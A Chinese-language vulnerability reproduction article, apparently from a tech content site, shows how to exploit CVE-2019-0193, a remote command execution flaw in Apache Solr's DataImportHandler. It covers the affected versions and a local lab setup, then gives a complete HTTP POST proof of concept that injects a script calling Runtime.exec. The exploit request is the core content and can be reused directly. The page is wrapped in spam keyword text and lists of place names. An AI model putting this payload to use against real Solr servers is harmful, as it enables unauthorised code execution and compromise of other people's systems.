91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

Apache Solr遠程命令執行CVE-2019-0193漏洞復現的示例分析

發布時間:2021-12-10 15:38:06 來源:億速云 閱讀:243 作者:柒染 欄目:大數據

今天就跟大家聊聊有關Apache Solr遠程命令執行CVE-2019-0193漏洞復現的示例分析,可能很多人都不太了解,為了讓大家更加了解,小編給大家總結了以下內容,希望大家根據這篇文章可以有所收獲。

0x01 影響范圍


Apache Solr < 8.2.0

0x02 環境搭建


下載地址:

https://www.apache.org/dyn/closer.lua/lucene/solr/7.7.2/solr-7.7.2.zip

在本地解壓,進入solr-7.7.2目錄,執行命令

bin/solr -e dih (前提:java環境)

Apache Solr遠程命令執行CVE-2019-0193漏洞復現的示例分析

然后訪問http://localhost:8983/solr即可訪問環境

0x03 漏洞利用


首先我們可以通過接口

curl http://127.0.0.1:8983/solr/admin/cores

來獲取所有 core 信息,下面我們構造 payload 需要 name 信息

Apache Solr遠程命令執行CVE-2019-0193漏洞復現的示例分析

在Burp中發送以下POC即可執行命令彈出計算器,下面的<your_core_name> 需要替換為你獲取到的 core 的 name(共兩處)

POST /solr/<your_core_name>/dataimport HTTP/1.1Host: 127.0.0.1:8983Content-Length: 763User-Agent: Mozilla/5.0Content-type: application/x-www-form-urlencodedConnection: close
command=full-import&verbose=false&clean=false&commit=true&debug=true&core=<your_core_name>&name=dataimport&dataConfig=<dataConfig><dataSource type="URLDataSource"/><script><![CDATA[function poc(row){var process= java.lang.Runtime.getRuntime();process.exec("calc");return row;}]]></script><document><entity name="stackoverflow"url="https://stackoverflow.com/feeds/tag/solr"processor="XPathEntityProcessor"forEach="/feed"transformer="script:poc" /></document></dataConfig>
執行效果如下:

Apache Solr遠程命令執行CVE-2019-0193漏洞復現的示例分析

看完上述內容,你們對Apache Solr遠程命令執行CVE-2019-0193漏洞復現的示例分析有進一步的了解嗎?如果還想了解更多知識或者相關內容,請關注億速云行業資訊頻道,感謝大家的支持。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

天门市| 奉新县| 清流县| 仁怀市| 赫章县| 大悟县| 曲沃县| 白河县| 镇赉县| 土默特右旗| 锡林浩特市| 枝江市| 崇礼县| 蓬溪县| 宁城县| 蓬安县| 南充市| 措勤县| 长宁县| 定安县| 海原县| 高清| 牙克石市| 盐亭县| 北川| 子洲县| 沈丘县| 平山县| 舒兰市| 阳谷县| 库伦旗| 呼伦贝尔市| 惠水县| 无为县| 瑞昌市| 澄江县| 仙桃市| 东方市| 吴江市| 建昌县| 社旗县|